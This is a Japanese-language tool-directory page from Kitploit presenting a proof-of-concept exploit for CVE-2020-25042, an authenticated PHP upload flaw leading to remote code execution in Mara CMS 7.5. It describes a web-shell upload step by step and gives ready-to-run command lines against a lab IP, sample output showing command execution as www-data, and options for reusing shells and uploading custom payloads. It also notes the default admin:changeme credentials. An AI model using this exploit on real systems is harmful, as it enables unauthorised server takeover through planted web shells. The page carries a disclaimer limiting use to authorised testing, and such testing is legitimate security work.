Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-25042-PoC — CVE-2020-25042 の PoC: Mara CMS 7.5 における認証済み PHP アップロードから RCE への自動化、ログインハッシュ処理、シェルの再利用、カスタムペイロード対応、クリーンな CLI 出力。 | Kitploit
ツール/GitHubGitHub/groppoxx/cve-2020-25042-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubgroppoxx/cve-2020-25042-poc

CVE-2020-25042-PoC

CVE-2020-25042 の PoC: Mara CMS 7.5 における認証済み PHP アップロードから RCE への自動化、ログインハッシュ処理、シェルの再利用、カスタムペイロード対応、クリーンな CLI 出力。

リポジトリを見る
543ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-25042-PoC

CVE-2020-25042 の概念実証です。Mara CMS 7.5 における認証済みの任意ファイルアップロードの問題を悪用し、リモートコード実行につなげます。

このスクリプトは有効な Mara CMS 管理・マネージャーアカウントでログインし、codebase/handler.php を通じて PHP ペイロードをアップロードし、アップロードしたファイルを介してコマンドを実行します。

また、可能な場合は既存のシェルを再利用するため、実行のたびに新しい PHP ファイルを作成しません。

動作概要

  1. 期待するシェルが既に存在し、再利用可能かどうかを確認します。
  2. 再利用可能であれば、直接コマンドを実行します。
  3. 再利用不可の場合、CMS ページを読み込み shash を抽出します。
  4. setsalt アクションでログイン用ソルトを要求します。
  5. Mara CMS のログインハッシュを計算します。
  6. 有効なユーザーとして認証します。
  7. codebase/dir.php?type=filenew でアップロードフローを開きます。
  8. codebase/handler.php を通じて PHP コマンドペイロードをアップロードします。
  9. アップロードしたシェルを介して --cmd を実行します。

必要条件

root@kitploit:~
Python 3.8+

pip install -r requirements.txt

必要な Python パッケージ:

root@kitploit:~
requests
urllib3

クイックスタート

山括弧で囲まれた値はプレースホルダーです。実際の値に置き換え、< や > の文字は含めないでください。

root@kitploit:~
python3 cve_2020_25042.py \
  --url <MARA_CMS_URL> \
  --username <USERNAME> \
  --password '<PASSWORD>' \
  --cmd whoami

プレースホルダー

root@kitploit:~
<MARA_CMS_URL>  # 対象の Mara CMS ベース URL。例: http://target/cms
<USERNAME>      # 有効な Mara CMS 管理・マネージャーユーザー名。
<PASSWORD>      # 有効な Mara CMS 管理・マネージャーパスワード。

完全な例

root@kitploit:~
python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --username admin \
  --password changeme \
  --cmd whoami

出力例:

root@kitploit:~
[2026-05-17T23:32:31Z] [*] 既存のシェルを確認中: http://10.129.96.20/cms/img/mara-poc.php
[2026-05-17T23:32:31Z] [*] Mara CMS ページを読み込み、セッションデータを収集
[2026-05-17T23:32:31Z] [+] shash を発見: 9552
[2026-05-17T23:32:31Z] [*] ログインソルトを要求中
[2026-05-17T23:32:31Z] [+] ソルト取得成功: 4253
[2026-05-17T23:32:31Z] [*] admin としてログイン中
[2026-05-17T23:32:31Z] [+] ログイン成功: OK:5
[2026-05-17T23:32:31Z] [*] アップロードフォームを開く
[2026-05-17T23:32:32Z] [*] PHP ペイロードを mara-poc.php としてアップロード中
[2026-05-17T23:32:32Z] [+] アップロードリクエスト完了
[2026-05-17T23:32:32Z] [+] シェル URL: http://10.129.96.20/cms/img/mara-poc.php
[2026-05-17T23:32:32Z] [*] コマンド実行中: whoami

[+] コマンド出力
MARA_CVE_2020_25042_OK
www-data

既存のシェルの再利用

デフォルトでは、スクリプトは固定のシェル名を使用します:

root@kitploit:~
mara-poc.php

次回の実行時には、以下を確認します:

root@kitploit:~
http://target/cms/img/mara-poc.php

シェルが期待されるマーカーで応答した場合、スクリプトはログインとアップロードをスキップします:

root@kitploit:~
python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --cmd "ls -la"

以前のランダムな名前で作成したシェルを再利用する場合:

root@kitploit:~
python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --shell-name mara-poc-jxfizldy.php \
  --cmd whoami

公開されたシェルパスを直接指定することもできます:

root@kitploit:~
python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --shell-url-path /cms/img/mara-poc-jxfizldy.php \
  --cmd "ls -la"

アップロードのみ

コマンドを実行せずにペイロードをアップロード:

root@kitploit:~
python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --username admin \
  --password changeme \
  --upload-only

オプションフラグ

root@kitploit:~
--page <PAGE>
   ログインと shash 抽出のベースとして使用する既存の CMS ページ。デフォルト: lorem.php

--shell-name <NAME>
   アップロードまたは再利用する PHP ファイル名。デフォルト: mara-poc.php

--shell-url-path <PATH_OR_URL>
   再利用する明示的なシェルパスまたは URL。
   例: /cms/img/mara-poc.php

--payload-file <FILE>
   デフォルトの ?cmd= シェルではなく、カスタム PHP ペイロードをアップロードします。

--destdir <DIR>
   アップロードフォームで送信する raw destdir 値。デフォルトでは Mara CMS の img/ を使用します。

--force-upload
   再利用可能なシェルが既に存在する場合でも、常にログインしてアップロードします。

--upload-only
   ペイロードをアップロードしますが、--cmd は実行しません。

--only-final
   進捗ログを非表示にし、コマンド出力のみを表示します。

--no-color
   ANSI カラーを無効にします。

--debug
   リクエスト URL と短いハンドラ応答のスニペットを表示します。

注意事項

  • このエクスプロイトには、有効な認証済みの Mara CMS 管理またはマネージャーセッションが必要です。
  • デフォルトの Mara CMS 認証情報は、未改変のテストインストールでは admin:changeme の場合があります。
  • デフォルトのペイロードは、コマンド出力の前に MARA_CVE_2020_25042_OK を出力します。
  • Mara CMS 7.5 で確認されたデフォルトのアップロード先は img/ です。
  • 可能な限りシェルを再利用し、ターゲット上に多数の PHP ファイルを残さないようにしてください。
  • --force-upload は、ペイロードを上書きまたは再作成する必要がある場合にのみ使用してください。

法的免責事項

この PoC は 許可されたセキュリティテスト、実験環境、脆弱性検証を目的としています。 明示的な許可なくシステムに対して使用しないでください。

ツールをダウンロード